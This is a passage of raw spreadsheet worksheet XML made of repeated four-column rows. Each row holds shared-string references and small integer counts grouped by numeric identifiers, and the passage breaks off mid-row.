      <c r="B22065" t="s">
        <v>16220</v>
      </c>
      <c r="C22065">
        <v>0</v>
      </c>
      <c r="D22065">
        <v>5801</v>
      </c>
    </row>
    <row r="22066" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22066" t="s">
        <v>16229</v>
      </c>
      <c r="B22066" t="s">
        <v>16221</v>
      </c>
      <c r="C22066">
        <v>0</v>
      </c>
      <c r="D22066">
        <v>5801</v>
      </c>
    </row>
    <row r="22067" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22067" t="s">
        <v>16230</v>
      </c>
      <c r="B22067" t="s">
        <v>16222</v>
      </c>
      <c r="C22067">
        <v>0</v>
      </c>
      <c r="D22067">
        <v>5801</v>
      </c>
    </row>
    <row r="22068" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22068" t="s">
        <v>16223</v>
      </c>
      <c r="B22068" t="s">
        <v>16223</v>
      </c>
      <c r="C22068">
        <v>24</v>
      </c>
      <c r="D22068">
        <v>5801</v>
      </c>
    </row>
    <row r="22069" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22069" t="s">
        <v>16224</v>
      </c>
      <c r="B22069" t="s">
        <v>16224</v>
      </c>
      <c r="C22069">
        <v>1</v>
      </c>
      <c r="D22069">
        <v>5801</v>
      </c>
    </row>
    <row r="22070" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22070" t="s">
        <v>16228</v>
      </c>
      <c r="B22070" t="s">
        <v>16211</v>
      </c>
      <c r="C22070">
        <v>0</v>
      </c>
      <c r="D22070">
        <v>1688</v>
      </c>
    </row>
    <row r="22071" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22071" t="s">
        <v>16231</v>
      </c>
      <c r="B22071" t="s">
        <v>16212</v>
      </c>
      <c r="C22071">
        <v>0</v>
      </c>
      <c r="D22071">
        <v>1688</v>
      </c>
    </row>
    <row r="22072" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22072" t="s">
        <v>16228</v>
      </c>
      <c r="B22072" t="s">
        <v>16213</v>
      </c>
      <c r="C22072">
        <v>0</v>
      </c>
      <c r="D22072">
        <v>1688</v>
      </c>
    </row>
    <row r="22073" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22073" t="s">
        <v>16231</v>
      </c>
      <c r="B22073" t="s">
        <v>16214</v>
      </c>
      <c r="C22073">
        <v>0</v>
      </c>
      <c r="D22073">
        <v>1688</v>
      </c>
    </row>
    <row r="22074" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22074" t="s">
        <v>16228</v>
      </c>
      <c r="B22074" t="s">
        <v>16215</v>
      </c>
      <c r="C22074">
        <v>0</v>
      </c>
      <c r="D22074">
        <v>1688</v>
      </c>
    </row>
    <row r="22075" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22075" t="s">
        <v>16231</v>
      </c>
      <c r="B22075" t="s">
        <v>16216</v>
      </c>
      <c r="C22075">
        <v>1</v>
      </c>
      <c r="D22075">
        <v>1688</v>
      </c>
    </row>
    <row r="22076" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22076" t="s">
        <v>16228</v>
      </c>
      <c r="B22076" t="s">
        <v>16217</v>
      </c>
      <c r="C22076">
        <v>4</v>
      </c>
      <c r="D22076">
        <v>1688</v>
      </c>
    </row>
    <row r="22077" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22077" t="s">
        <v>16231</v>
      </c>
      <c r="B22077" t="s">
        <v>16218</v>
      </c>
      <c r="C22077">
        <v>0</v>
      </c>
      <c r="D22077">
        <v>1688</v>
      </c>
    </row>
    <row r="22078" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22078" t="s">
        <v>16229</v>
      </c>
      <c r="B22078" t="s">
        <v>16219</v>
      </c>
      <c r="C22078">
        <v>0</v>
      </c>
      <c r="D22078">
        <v>1688</v>
      </c>
    </row>
    <row r="22079" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22079" t="s">
        <v>16230</v>
      </c>
      <c r="B22079" t="s">
        <v>16220</v>
      </c>
      <c r="C22079">
        <v>0</v>
      </c>
      <c r="D22079">
        <v>1688</v>
      </c>
    </row>
    <row r="22080" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22080" t="s">
        <v>16229</v>
      </c>
      <c r="B22080" t="s">
        <v>16221</v>
      </c>
      <c r="C22080">
        <v>0</v>
      </c>
      <c r="D22080">
        <v>1688</v>
      </c>
    </row>
    <row r="22081" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22081" t="s">
        <v>16230</v>
      </c>
      <c r="B22081" t="s">
        <v>16222</v>
      </c>
      <c r="C22081">
        <v>0</v>
      </c>
      <c r="D22081">
        <v>1688</v>
      </c>
    </row>
    <row r="22082" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22082" t="s">
        <v>16223</v>
      </c>
      <c r="B22082" t="s">
        <v>16223</v>
      </c>
      <c r="C22082">
        <v>5</v>
      </c>
      <c r="D22082">
        <v>1688</v>
      </c>
    </row>
    <row r="22083" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22083" t="s">
        <v>16224</v>
      </c>
      <c r="B22083" t="s">
        <v>16224</v>
      </c>
      <c r="C22083">
        <v>1</v>
      </c>
      <c r="D22083">
        <v>1688</v>
      </c>
    </row>
    <row r="22084" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22084" t="s">
        <v>16228</v>
      </c>
      <c r="B22084" t="s">
        <v>16215</v>
      </c>
      <c r="C22084">
        <v>3</v>
      </c>
      <c r="D22084">
        <v>5228</v>
      </c>
    </row>
    <row r="22085" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22085" t="s">
        <v>16228</v>
      </c>
      <c r="B22085" t="s">
        <v>16217</v>
      </c>
      <c r="C22085">
        <v>8</v>
      </c>
      <c r="D22085">
        <v>5228</v>
      </c>
    </row>
    <row r="22086" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22086" t="s">
        <v>16228</v>
      </c>
      <c r="B22086" t="s">
        <v>16211</v>
      </c>
      <c r="C22086">
        <v>0</v>
      </c>
      <c r="D22086">
        <v>4816</v>
      </c>
    </row>
    <row r="22087" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22087" t="s">
        <v>16231</v>
      </c>
      <c r="B22087" t="s">
        <v>16212</v>
      </c>
      <c r="C22087">
        <v>0</v>
      </c>
      <c r="D22087">
        <v>4816</v>
      </c>
    </row>
    <row r="22088" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22088" t="s">
        <v>16228</v>
      </c>
      <c r="B22088" t="s">
        <v>16213</v>
      </c>
      <c r="C22088">
        <v>0</v>
      </c>
      <c r="D22088">
        <v>4816</v>
      </c>
    </row>
    <row r="22089" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22089" t="s">
        <v>16231</v>
      </c>
      <c r="B22089" t="s">
        <v>16214</v>
      </c>
      <c r="C22089">
        <v>0</v>
      </c>
      <c r="D22089">
        <v>4816</v>
      </c>
    </row>
    <row r="22090" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22090" t="s">
        <v>16228</v>
      </c>
      <c r="B22090" t="s">
        <v>16215</v>
      </c>
      <c r="C22090">
        <v>2</v>
      </c>
      <c r="D22090">
        <v>4816</v>
      </c>
    </row>
    <row r="22091" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22091" t="s">
        <v>16231</v>
      </c>
      <c r="B22091" t="s">
        <v>16216</v>
      </c>
      <c r="C22091">
        <v>2</v>
      </c>
      <c r="D22091">
        <v>4816</v>
      </c>
    </row>
    <row r="22092" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22092" t="s">
        <v>16228</v>
      </c>
      <c r="B22092" t="s">
        <v>16217</v>
      </c>
      <c r="C22092">
        <v>2</v>
      </c>
      <c r="D22092">
        <v>4816</v>
      </c>
    </row>
    <row r="22093" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22093" t="s">
        <v>16231</v>
      </c>
      <c r="B22093" t="s">
        <v>16218</v>
      </c>
      <c r="C22093">
        <v>2</v>
      </c>
      <c r="D22093">
        <v>4816</v>
      </c>
    </row>
    <row r="22094" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22094" t="s">
        <v>16229</v>
      </c>
      <c r="B22094" t="s">
        <v>16219</v>
      </c>
      <c r="C22094">
        <v>0</v>
      </c>
      <c r="D22094">
        <v>4816</v>
      </c>
    </row>
    <row r="22095" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22095" t="s">
        <v>16230</v>
      </c>
      <c r="B22095" t="s">
        <v>16220</v>
      </c>
      <c r="C22095">
        <v>0</v>
      </c>
      <c r="D22095">
        <v>4816</v>
      </c>
    </row>
    <row r="22096" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22096" t="s">
        <v>16229</v>
      </c>
      <c r="B22096" t="s">
        <v>16221</v>
      </c>
      <c r="C22096">
        <v>3</v>
      </c>
      <c r="D22096">
        <v>4816</v>
      </c>
    </row>
    <row r="22097" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22097" t="s">
        <v>16230</v>
      </c>
      <c r="B22097" t="s">
        <v>16222</v>
      </c>
      <c r="C22097">
        <v>2</v>
      </c>
      <c r="D22097">
        <v>4816</v>
      </c>
    </row>
    <row r="22098" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22098" t="s">
        <v>16223</v>
      </c>
      <c r="B22098" t="s">
        <v>16223</v>
      </c>
      <c r="C22098">
        <v>7</v>
      </c>
      <c r="D22098">
        <v>4816</v>
      </c>
    </row>
    <row r="22099" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22099" t="s">
        <v>16224</v>
      </c>
      <c r="B22099" t="s">
        <v>16224</v>
      </c>
      <c r="C22099">
        <v>0</v>
      </c>
      <c r="D22099">
        <v>4816</v>
      </c>
    </row>
    <row r="22100" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22100" t="s">
        <v>16228</v>
      </c>
      <c r="B22100" t="s">
        <v>16211</v>
      </c>
      <c r="C22100">
        <v>0</v>
      </c>
      <c r="D22100">
        <v>5106</v>
      </c>
    </row>
    <row r="22101" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22101" t="s">
        <v>16231</v>
      </c>
      <c r="B22101" t="s">
        <v>16212</v>
      </c>
      <c r="C22101">
        <v>0</v>
      </c>
      <c r="D22101">
        <v>5106</v>
      </c>
    </row>
    <row r="22102" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22102" t="s">
        <v>16228</v>
      </c>
      <c r="B22102" t="s">
        <v>16213</v>
      </c>
      <c r="C22102">
        <v>0</v>
      </c>
      <c r="D22102">
        <v>5106</v>
      </c>
    </row>
    <row r="22103" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22103" t="s">
        <v>16231</v>
      </c>
      <c r="B22103" t="s">
        <v>16214</v>
      </c>
      <c r="C22103">
        <v>0</v>
      </c>
      <c r="D22103">
        <v>5106</v>
      </c>
    </row>
    <row r="22104" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22104" t="s">
        <v>16228</v>
      </c>
      <c r="B22104" t="s">
        <v>16215</v>
      </c>
      <c r="C22104">
        <v>0</v>
      </c>
      <c r="D22104">
        <v>5106</v>
      </c>
    </row>
    <row r="22105" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22105" t="s">
        <v>16231</v>
      </c>
      <c r="B22105" t="s">
        <v>16216</v>
      </c>
      <c r="C22105">
        <v>1</v>
      </c>
      <c r="D22105">
        <v>5106</v>
      </c>
    </row>
    <row r="22106" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22106" t="s">
        <v>16228</v>
      </c>
      <c r="B22106" t="s">
        <v>16217</v>
      </c>
      <c r="C22106">
        <v>13</v>
      </c>
      <c r="D22106">
        <v>5106</v>
      </c>
    </row>
    <row r="22107" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22107" t="s">
        <v>16231</v>
      </c>
      <c r="B22107" t="s">
        <v>16218</v>
      </c>
      <c r="C22107">
        <v>30</v>
      </c>
      <c r="D22107">
        <v>5106</v>
      </c>
    </row>
    <row r="22108" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22108" t="s">
        <v>16229</v>
      </c>
      <c r="B22108" t="s">
        <v>16219</v>
      </c>
      <c r="C22108">
        <v>0</v>
      </c>
      <c r="D22108">
        <v>5106</v>
      </c>
    </row>
    <row r="22109" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22109" t="s">
        <v>16230</v>
      </c>
      <c r="B22109" t="s">
        <v>16220</v>
      </c>
      <c r="C22109">
        <v>0</v>
      </c>
      <c r="D22109">
        <v>5106</v>
      </c>
    </row>
    <row r="22110" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22110" t="s">
        <v>16229</v>
      </c>
      <c r="B22110" t="s">
        <v>16221</v>
      </c>
      <c r="C22110">
        <v>0</v>
      </c>
      <c r="D22110">
        <v>5106</v>
      </c>
    </row>
    <row r="22111" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22111" t="s">
        <v>16230</v>
      </c>
      <c r="B22111" t="s">
        <v>16222</v>
      </c>
      <c r="C22111">
        <v>0</v>
      </c>
      <c r="D22111">
        <v>5106</v>
      </c>
    </row>
    <row r="22112" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22112" t="s">
        <v>16223</v>
      </c>
      <c r="B22112" t="s">
        <v>16223</v>
      </c>
      <c r="C22112">
        <v>24</v>
      </c>
      <c r="D22112">
        <v>5106</v>
      </c>
    </row>
    <row r="22113" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22113" t="s">
        <v>16224</v>
      </c>
      <c r="B22113" t="s">
        <v>16224</v>
      </c>
      <c r="C22113">
        <v>1</v>
      </c>
      <c r="D22113">
        <v>5106</v>
      </c>
    </row>
    <row r="22114" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22114" t="s">
        <v>16228</v>
      </c>
      <c r="B22114" t="s">
        <v>16211</v>
      </c>
      <c r="C22114">
        <v>0</v>
      </c>
      <c r="D22114">
        <v>581</v>
      </c>
    </row>
    <row r="22115" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22115" t="s">
        <v>16231</v>
      </c>
      <c r="B22115" t="s">
        <v>16212</v>
      </c>
      <c r="C22115">
        <v>0</v>
      </c>
      <c r="D22115">
        <v>581</v>
      </c>
    </row>
    <row r="22116" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22116" t="s">
        <v>16228</v>
      </c>
      <c r="B22116" t="s">
        <v>16213</v>
      </c>
      <c r="C22116">
        <v>0</v>
      </c>
      <c r="D22116">
        <v>581</v>
      </c>
    </row>
    <row r="22117" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22117" t="s">
        <v>16231</v>
      </c>
      <c r="B22117" t="s">
        <v>16214</v>
      </c>
      <c r="C22117">
        <v>0</v>
      </c>
      <c r="D22117">
        <v>581</v>
      </c>
    </row>
    <row r="22118" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22118" t="s">
        <v>16228</v>
      </c>
      <c r="B22118" t="s">
        <v>16215</v>
      </c>
      <c r="C22118">
        <v>6</v>
      </c>
      <c r="D22118">
        <v>581</v>
      </c>
    </row>
    <row r="22119" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22119" t="s">
        <v>16231</v>
      </c>
      <c r="B22119" t="s">
        <v>16216</v>
      </c>
      <c r="C22119">
        <v>4</v>
      </c>
      <c r="D22119">
        <v>581</v>
      </c>
    </row>
    <row r="22120" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22120" t="s">
        <v>16228</v>
      </c>
      <c r="B22120" t="s">
        <v>16217</v>
      </c>
      <c r="C22120">
        <v>0</v>
      </c>
      <c r="D22120">
        <v>581</v>
      </c>
    </row>
    <row r="22121" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22121" t="s">
        <v>16231</v>
      </c>
      <c r="B22121" t="s">
        <v>16218</v>
      </c>
      <c r="C22121">
        <v>0</v>
      </c>
      <c r="D22121">
        <v>581</v>
      </c>
    </row>
    <row r="22122" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22122" t="s">
        <v>16229</v>
      </c>
      <c r="B22122" t="s">
        <v>16219</v>
      </c>
      <c r="C22122">
        <v>0</v>
      </c>
      <c r="D22122">
        <v>581</v>
      </c>
    </row>
    <row r="22123" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22123" t="s">
        <v>16230</v>
      </c>
      <c r="B22123" t="s">
        <v>16220</v>
      </c>
      <c r="C22123">
        <v>0</v>
      </c>
      <c r="D22123">
        <v>581</v>
      </c>
    </row>
    <row r="22124" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22124" t="s">
        <v>16229</v>
      </c>
      <c r="B22124" t="s">
        <v>16221</v>
      </c>
      <c r="C22124">
        <v>15</v>
      </c>
      <c r="D22124">
        <v>581</v>
      </c>
    </row>
    <row r="22125" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22125" t="s">
        <v>16230</v>
      </c>
      <c r="B22125" t="s">
        <v>16222</v>
      </c>
      <c r="C22125">
        <v>10</v>
      </c>
      <c r="D22125">
        <v>581</v>
      </c>
    </row>
    <row r="22126" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22126" t="s">
        <v>16223</v>
      </c>
      <c r="B22126" t="s">
        <v>16223</v>
      </c>
      <c r="C22126">
        <v>25</v>
      </c>
      <c r="D22126">
        <v>581</v>
      </c>
    </row>
    <row r="22127" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22127" t="s">
        <v>16224</v>
      </c>
      <c r="B22127" t="s">
        <v>16224</v>
      </c>
      <c r="C22127">
        <v>1</v>
      </c>
      <c r="D22127">
        <v>581</v>
      </c>
    </row>
    <row r="22128" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22128" t="s">
        <v>16228</v>
      </c>
      <c r="B22128" t="s">
        <v>16211</v>
      </c>
      <c r="C22128">
        <v>0</v>
      </c>
      <c r="D22128">
        <v>5713</v>
      </c>
    </row>
    <row r="22129" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22129" t="s">
        <v>16231</v>
      </c>
      <c r="B22129" t="s">
        <v>16212</v>
      </c>
      <c r="C22129">
        <v>0</v>
      </c>
      <c r="D22129">
        <v>5713</v>
      </c>
    </row>
    <row r="22130" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22130" t="s">
        <v>16228</v>
      </c>
      <c r="B22130" t="s">
        <v>16213</v>
      </c>
      <c r="C22130">
        <v>0</v>
      </c>
      <c r="D22130">
        <v>5713</v>
      </c>
    </row>
    <row r="22131" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22131" t="s">
        <v>16231</v>
      </c>
      <c r="B22131" t="s">
        <v>16214</v>
      </c>
      <c r="C22131">
        <v>0</v>
      </c>
      <c r="D22131">
        <v>5713</v>
      </c>
    </row>
    <row r="22132" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22132" t="s">
        <v>16228</v>
      </c>
      <c r="B22132" t="s">
        <v>16215</v>
      </c>
      <c r="C22132">
        <v>0</v>
      </c>
      <c r="D22132">
        <v>5713</v>
      </c>
    </row>
    <row r="22133" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22133" t="s">
        <v>16231</v>
      </c>
      <c r="B22133" t="s">
        <v>16216</v>
      </c>
      <c r="C22133">
        <v>1</v>
      </c>
      <c r="D22133">
        <v>5713</v>
      </c>
    </row>
    <row r="22134" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22134" t="s">
        <v>16228</v>
      </c>
      <c r="B22134" t="s">
        <v>16217</v>
      </c>
      <c r="C22134">
        <v>2</v>
      </c>
      <c r="D22134">
        <v>5713</v>
      </c>
    </row>
    <row r="22135" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22135" t="s">
        <v>16231</v>
      </c>
      <c r="B22135" t="s">
        <v>16218</v>
      </c>
      <c r="C22135">
        <v>0</v>
      </c>
      <c r="D22135">
        <v>5713</v>
      </c>
    </row>
    <row r="22136" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22136" t="s">
        <v>16229</v>
      </c>
      <c r="B22136" t="s">
        <v>16219</v>
      </c>
      <c r="C22136">
        <v>0</v>
      </c>
      <c r="D22136">
        <v>5713</v>
      </c>
    </row>
    <row r="22137" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22137" t="s">
        <v>16230</v>
      </c>
      <c r="B22137" t="s">
        <v>16220</v>
      </c>
      <c r="C22137">
        <v>0</v>
      </c>
      <c r="D22137">
        <v>5713</v>
      </c>
    </row>
    <row r="22138" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22138" t="s">
        <v>16229</v>
      </c>
      <c r="B22138" t="s">
        <v>16221</v>
      </c>
      <c r="C22138">
        <v>0</v>
      </c>
      <c r="D22138">
        <v>5713</v>
      </c>
    </row>
    <row r="22139" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22139" t="s">
        <v>16230</v>
      </c>
      <c r="B22139" t="s">
        <v>16222</v>
      </c>
      <c r="C22139">
        <v>0</v>
      </c>
      <c r="D22139">
        <v>5713</v>
      </c>
    </row>
    <row r="22140" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22140" t="s">
        <v>16223</v>
      </c>
      <c r="B22140" t="s">
        <v>16223</v>
      </c>
      <c r="C22140">
        <v>24</v>
      </c>
      <c r="D22140">
        <v>5713</v>
      </c>
    </row>
    <row r="22141" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22141" t="s">
        <v>16224</v>
      </c>
      <c r="B22141" t="s">
        <v>16224</v>
      </c>
      <c r="C22141">
        <v>1</v>
      </c>
      <c r="D22141">
        <v>5713</v>
      </c>
    </row>
    <row r="22142" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22142" t="s">
        <v>16228</v>
      </c>
      <c r="B22142" t="s">
        <v>16211</v>
      </c>
      <c r="C22142">
        <v>0</v>
      </c>
      <c r="D22142">
        <v>5747</v>
      </c>
    </row>
    <row r="22143" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22143" t="s">
        <v>16231</v>
      </c>
      <c r="B22143" t="s">
        <v>16212</v>
      </c>
      <c r="C22143">
        <v>0</v>
      </c>
      <c r="D22143">
        <v>5747</v>
      </c>
    </row>
    <row r="22144" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22144" t="s">
        <v>16228</v>
      </c>
      <c r="B22144" t="s">
        <v>16213</v>
      </c>
      <c r="C22144">
        <v>0</v>
      </c>
      <c r="D22144">
        <v>5747</v>
      </c>
    </row>
    <row r="22145" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22145" t="s">
        <v>16231</v>
      </c>
      <c r="B22145" t="s">
        <v>16214</v>
      </c>
      <c r="C22145">
        <v>0</v>
      </c>
      <c r="D22145">
        <v>5747</v>
      </c>
    </row>
    <row r="22146" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22146" t="s">
        <v>16228</v>
      </c>
      <c r="B22146" t="s">
        <v>16215</v>
      </c>
      <c r="C22146">
        <v>15</v>
      </c>
      <c r="D22146">
        <v>5747</v>
      </c>
    </row>
    <row r="22147" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22147" t="s">
        <v>16231</v>
      </c>
      <c r="B22147" t="s">
        <v>16216</v>
      </c>
      <c r="C22147">
        <v>0</v>
      </c>
      <c r="D22147">
        <v>5747</v>
      </c>
    </row>
    <row r="22148" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22148" t="s">
        <v>16228</v>
      </c>
      <c r="B22148" t="s">
        <v>16217</v>
      </c>
      <c r="C22148">
        <v>0</v>
      </c>
      <c r="D22148">
        <v>5747</v>
      </c>
    </row>
    <row r="22149" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22149" t="s">
        <v>16231</v>
      </c>
      <c r="B22149" t="s">
        <v>16218</v>
      </c>
      <c r="C22149">
        <v>0</v>
      </c>
      <c r="D22149">
        <v>5747</v>
      </c>
    </row>
    <row r="22150" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22150" t="s">
        <v>16229</v>
      </c>
      <c r="B22150" t="s">
        <v>16219</v>
      </c>
      <c r="C22150">
        <v>5</v>
      </c>
      <c r="D22150">
        <v>5747</v>
      </c>
    </row>
    <row r="22151" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22151" t="s">
        <v>16230</v>
      </c>
      <c r="B22151" t="s">
        <v>16220</v>
      </c>
      <c r="C22151">
        <v>0</v>
      </c>
      <c r="D22151">
        <v>5747</v>
      </c>
    </row>
    <row r="22152" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22152" t="s">
        <v>16229</v>
      </c>
      <c r="B22152" t="s">
        <v>16221</v>
      </c>
      <c r="C22152">
        <v>0</v>
      </c>
      <c r="D22152">
        <v>5747</v>
      </c>
    </row>
    <row r="22153" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22153" t="s">
        <v>16230</v>
      </c>
      <c r="B22153" t="s">
        <v>16222</v>
      </c>
      <c r="C22153">
        <v>0</v>
      </c>
      <c r="D22153">
        <v>5747</v>
      </c>
    </row>
    <row r="22154" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22154" t="s">
        <v>16223</v>
      </c>
      <c r="B22154" t="s">
        <v>16223</v>
      </c>
      <c r="C22154">
        <v>26</v>
      </c>
      <c r="D22154">
        <v>5747</v>
      </c>
    </row>
    <row r="22155" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22155" t="s">
        <v>16224</v>
      </c>
      <c r="B22155" t="s">
        <v>16224</v>
      </c>
      <c r="C22155">
        <v>0</v>
      </c>
      <c r="D22155">
        <v>5747</v>
      </c>
    </row>
    <row r="22156" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22156" t="s">
        <v>16228</v>
      </c>
      <c r="B22156" t="s">
        <v>16211</v>
      </c>
      <c r="C22156">
        <v>0</v>
      </c>
      <c r="D22156">
        <v>5769</v>
      </c>
    </row>
    <row r="22157" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22157" t="s">
        <v>16231</v>
      </c>
      <c r="B22157" t="s">
        <v>16212</v>
      </c>
      <c r="C22157">
        <v>0</v>
      </c>
      <c r="D22157">
        <v>5769</v>
      </c>
    </row>
    <row r="22158" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22158" t="s">
        <v>16228</v>
      </c>
      <c r="B22158" t="s">
        <v>16213</v>
      </c>
      <c r="C22158">
        <v>0</v>
      </c>
      <c r="D22158">
        <v>5769</v>
      </c>
    </row>
    <row r="22159" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22159" t="s">
        <v>16231</v>
      </c>
      <c r="B22159" t="s">
        <v>16214</v>
      </c>
      <c r="C22159">
        <v>0</v>
      </c>
      <c r="D22159">
        <v>5769</v>
      </c>
    </row>
    <row r="22160" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22160" t="s">
        <v>16228</v>
      </c>
      <c r="B22160" t="s">
        <v>16215</v>
      </c>
      <c r="C22160">
        <v>4</v>
      </c>
      <c r="D22160">
        <v>5769</v>
      </c>
    </row>
    <row r="22161" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22161" t="s">
        <v>16231</v>
      </c>
      <c r="B22161" t="s">
        <v>16216</v>
      </c>
      <c r="C22161">
        <v>1</v>
      </c>
      <c r="D22161">
        <v>5769</v>
      </c>
    </row>
    <row r="22162" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22162" t="s">
        <v>16228</v>
      </c>
      <c r="B22162" t="s">
        <v>16217</v>
      </c>
      <c r="C22162">
        <v>0</v>
      </c>
      <c r="D22162">
        <v>5769</v>
      </c>
    </row>
    <row r="22163" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22163" t="s">
        <v>16231</v>
      </c>
      <c r="B22163" t="s">
        <v>16218</v>
      </c>
      <c r="C22163">
        <v>0</v>
      </c>
      <c r="D22163">
        <v>5769</v>
      </c>
    </row>
    <row r="22164" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22164" t="s">
        <v>16229</v>
      </c>
      <c r="B22164" t="s">
        <v>16219</v>
      </c>
      <c r="C22164">
        <v>0</v>
      </c>
      <c r="D22164">
        <v>5769</v>
      </c>
    </row>
    <row r="22165" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22165" t="s">
        <v>16230</v>
      </c>
      <c r="B22165" t="s">
        <v>16220</v>
      </c>
      <c r="C22165">
        <v>0</v>
      </c>
      <c r="D22165">
        <v>5769</v>
      </c>
    </row>
    <row r="22166" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22166" t="s">
        <v>16229</v>
      </c>
      <c r="B22166" t="s">
        <v>16221</v>
      </c>
      <c r="C22166">
        <v>10</v>
      </c>
      <c r="D22166">
        <v>5769</v>
      </c>
    </row>
    <row r="22167" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22167" t="s">
        <v>16230</v>
      </c>
      <c r="B22167" t="s">
        <v>16222</v>
      </c>
      <c r="C22167">
        <v>1</v>
      </c>
      <c r="D22167">
        <v>5769</v>
      </c>
    </row>
    <row r="22168" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22168" t="s">
        <v>16223</v>
      </c>
      <c r="B22168" t="s">
        <v>16223</v>
      </c>
      <c r="C22168">
        <v>0</v>
      </c>
      <c r="D22168">
        <v>5769</v>
      </c>
    </row>
    <row r="22169" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22169" t="s">
        <v>16224</v>
      </c>
      <c r="B22169" t="s">
        <v>16224</v>
      </c>
      <c r="C22169">
        <v>0</v>
      </c>
      <c r="D22169">
        <v>5769</v>
      </c>
    </row>
    <row r="22170" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A22170" t="s">
        <v>16228</v>
